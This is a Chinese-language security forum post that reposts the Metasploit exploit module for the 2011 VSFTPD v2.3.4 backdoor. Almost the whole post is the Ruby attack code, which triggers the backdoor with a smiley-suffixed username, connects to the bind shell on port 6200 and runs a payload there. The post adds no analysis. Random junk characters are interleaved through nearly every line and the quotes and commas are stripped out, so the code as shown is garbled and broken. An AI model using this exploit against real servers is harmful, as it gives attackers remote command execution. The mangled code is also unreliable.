最近看过此主题的会员

返回列表 发帖
VSFTPD v2.3.4 Backdoor 命令执行漏洞
################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################
1 r5 ]# d0 r7 O/ s( Q8 r
6 {/ {4 X+ U7 d0 D2 m8 v$ z4 F9 t% X

" p9 w; O+ h4 {6 I: crequire msf/core
$ A' p, o# e- ^" @9 Y/ B7 m, [3 d* }# O
class Metasploit3 < Msf::Exploit::Remote6 h% v: p- S3 [* V) \
Rank = ExcellentRanking9 F" J4 x  p0 {2 R4 v" R+ h, r
  f2 b. \+ C8 w& v! P) q5 Q! @
include Msf::Exploit::Remote::Tcp
' g. f2 o/ T; V' O6 e. E! C" m2 \- n& m
def initialize(info = {})4 H8 X/ q8 _7 F: B# |: i* M
super(update_info(info
6 s: ^) ]4 t) J  [Name => VSFTPD v2.3.4 Backdoor Command Execution
. y) \- x& h7 Z9 i- MDescript_ion => %q{" i4 l# B5 r9 P. R0 I
This module exploits a malicious backdoor that was added to the VSFTPD download
% r7 c+ i# M0 b. L! _archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between/ V+ }; q  ^) m0 _4 N5 S
June 30th 2011 and July 1st 2011 according to the most recent information7 `, W8 P1 a. O. A
available. This backdoor was removed on July 3rd 2011.. D+ _+ m$ h3 T, ?& Y' q0 q; s
}2 i$ A) e' I* ]3 G  q& p! e; _
Author => [ hdm mc ]
" S; W) y; J+ U2 \' ?) a- W; ], qLicense => MSF_LICENSE/ d* d: y& U4 t$ n
Version => $Revision: 13099 $; V6 l0 b5 `# i6 k+ V, F
References =>* m9 S' a+ P6 _1 \' P5 u
[5 U7 _' G, N1 E2 j; \# r0 g
[ URL http://pastebin.com/AetT9sS5]9 b( J2 t' s& B  b, ^* E- i
[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
. M# D& d9 h$ {]
( C  w, r% g4 c- C5 ]$ o' FPrivileged => true5 Q% r' T3 x, ^' [% k0 G- N
Platform => [ unix ]# B- n& F* F4 ^7 C# O- L$ s* L! x
Arch => ARCH_CMD
7 k( |9 b6 Y" {$ u/ g6 }, g$ p, qPayload =>1 X% `( ~) }9 d. n( q1 c' l' c" y- h( t
{
2 R$ M4 n$ S" ], q1 ~6 TSpace => 2000
0 G2 M# C6 V2 W# m. n" tBadChars => * F& H8 y4 y" c: X7 \$ U3 J7 Y
DisableNops => true
0 H) \$ t$ R7 iCompat =>; J7 [7 [, O, G5 L. o8 h
{
$ X4 v" \! z0 l6 L# HPayloadType => cmd_interact
$ k0 Y, C0 Q3 \; E, [0 }, OConnectionType => find
( b2 x4 Q& h$ b8 q, }" O}2 d6 q- X$ W. W+ b8 v  }
}
5 X& [, \: @3 L; b: q5 wTargets =>* j/ x& U% P$ Q9 W/ O4 a8 d" r
[2 \8 u# m' t5 Y0 z+ K% d% T- w
[ Automatic { } ]0 J; J5 A- k( X3 J$ O2 g* K/ B* i
]9 ]- h" Z0 U  h. x4 c5 E
DisclosureDate => Jul 3 2011; \+ g6 j7 j+ m5 G: f0 E
DefaultTarget => 0))( _, t5 z2 J1 m/ p  Z; j
) F. v* N/ |% _* g
register_options([ Opt::RPORT(21) ] self.class)
2 Y- p8 c( f- v. {3 b+ Iend  S- v# p, F5 B0 ~- M4 Q  l
' D! w& {; o4 X4 ~% P( A: M
def exploit
5 F$ p. n3 X! ~+ i4 d; o- a
8 Q# ]2 r( e& vnsock = self.connect(false {RPORT => 6200}) rescue nil
" W% U6 ?* P2 jif nsock
6 [% Z9 Z$ Q6 w' Mprint_status(The port used by the backdoor bind listener is already open)) i9 }' h: I/ w
handle_backdoor(nsock)- t0 G. |! Q  e8 J
return8 W6 a- o5 h, T7 e" t9 {
end: k: k& @/ Y9 z3 @
( i7 ~6 u9 g, T. D+ T0 Y! r6 ^
# Connect to the FTP service port first
4 {, h4 B7 W& L2 A0 G1 Oconnect
  l% q) _6 [; d% ?
) a% i+ j, ~. \2 obanner = sock.get_once(-1 30).to_s
# V9 }+ r- q. Y! o* Jprint_status(Banner: #{banner.strip})
) [0 C3 h  z" L8 @0 S
1 n. u' s+ T& `sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
" G0 f3 a- F  A& b7 r)
! k2 k6 x# G0 \resp = sock.get_once(-1 30).to_s
% r- M+ }' a3 y- \; T4 G% k3 iprint_status(USER: #{resp.strip})
% o4 c7 V2 W0 X& k+ c  |, j7 S
if resp =~ /^530 /
) B' s" z$ Y0 _, e9 \5 `) pprint_error(This server is configured for anonymous only and the backdoor code cannot be reached); m% e6 o: p$ |$ N6 b5 k
disconnect8 ^6 R# h$ b3 w2 k' a
return
& m' K% e8 ?8 Z& B  Hend8 _* t9 p) K) w8 c: H. B9 l
6 \9 g  F2 N  g$ ^3 i$ _: Q8 w
if resp !~ /^331 /" S- H8 W* `; h3 {8 N$ u
print_error(This server did not respond as expected: #{resp.strip})
! u# X$ \. b  edisconnect5 Y, F1 L; C9 l) A* U
return/ V. d% k! v) A7 K: y! `/ L% a
end
0 X1 i3 ]; B' `
0 I! A1 L- \! }7 Z9 P5 N. lsock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}
% P" h8 t) J6 h6 H$ l( z)
* f) F3 z. u6 S% |6 w; x7 ^5 O
$ h% y9 }4 `) }; r  q# Do not bother reading the response from password just try the backdoor
4 [  Q# _% |' d" L% O3 Z' W) y  q4 }nsock = self.connect(false {RPORT => 6200}) rescue nil0 ^7 a0 C/ j" ?! I  C8 O
if nsock
  ~* Y( s/ Q, ?" O: r: zprint_good(Backdoor service has been spawned handling...)+ g" Y/ {" V' B3 `) F' ]9 }/ P
handle_backdoor(nsock)
0 ^. P7 w8 v! @: creturn
2 y9 m1 |# V: a2 X8 E; X1 Rend/ E& l' k9 @* O/ ~* s! x4 D

6 B; W4 f- O1 ^1 @, Edisconnect
" \1 A" B- e3 x( ]+ A: N/ F: p  v3 A/ \' m
end
! J& j3 t' H4 |" e* |: n% N3 I: g1 e/ O9 J
def handle_backdoor(s)' |3 p" P6 {  l4 `5 h' ~! @2 z
1 }" R1 _  ^4 r( n
s.put(id
' B: u, `* {2 b1 W) ])
' E( {, @, o3 T9 e- Y% }
; f+ H  W6 x# `- n+ sr = s.get_once(-1 5).to_s- u7 w7 b" b+ J9 q6 c+ ~( x
if r !~ /uid=/3 V% h* f( P. h2 h- _2 K
print_error(The service on port 6200 does not appear to be a shell)
" {  U  m# i- r) m$ F* J" [disconnect(s)
' l1 y2 |& O2 ^8 u+ e9 f( ^6 Areturn
: J( ]: p$ f7 H8 [6 m. d1 hend
# o7 x; w/ G% K7 x$ L2 k; ~5 G$ b! y
' b2 I9 u% ?$ p' Y5 x' xprint_good(UID: #{r.strip})
* G; b- L! y" K! j- x
: p( [$ n& {& v# fs.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
' O& Y/ T3 u$ e# j4 }( ihandler(s)+ L7 K2 D9 Z! H3 L8 I% q
end+ t9 z4 j. V3 s( [6 `
  |- h6 [# P  t) N
end复制代码
1 I# P7 @1 D" B: H) V( i# V+ A/ r- u7 W% L! N) h- `
$ F$ P! n) X/ I$ c: U, z8 v& R
) W) ?" A5 Y1 U$ {# l+ f$ {
7 r4 k* {- J6 o* g5 T/ k" |# H0 H
+ }! a; t3 k9 B5 G
+ S2 v% d4 a4 {; `3 d( R

0 M2 r  R; S+ P# q3 m. y" d0 t! L; }

6 Q+ N. w4 u7 k! m, g) d' ~4 N7 s' W
* V) I5 v. M  o9 O! X+ Y
6 K  v$ {$ q/ X: S0 K3 ?: r- N5 l2 Z

8 @9 S1 b& K1 Q: R/ l1 n7 J
1 f. j9 V, q* l& J" A% b3 ?% |# Z: F" {7 C

- n/ b  z# E0 F- H# S9 r" m. `: g+ y- D+ `. E" Z; R8 i: k6 `
4 m( [7 o( Y; \" J- h! a9 Z# h
公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

启明星辰招聘

TOP

返回列表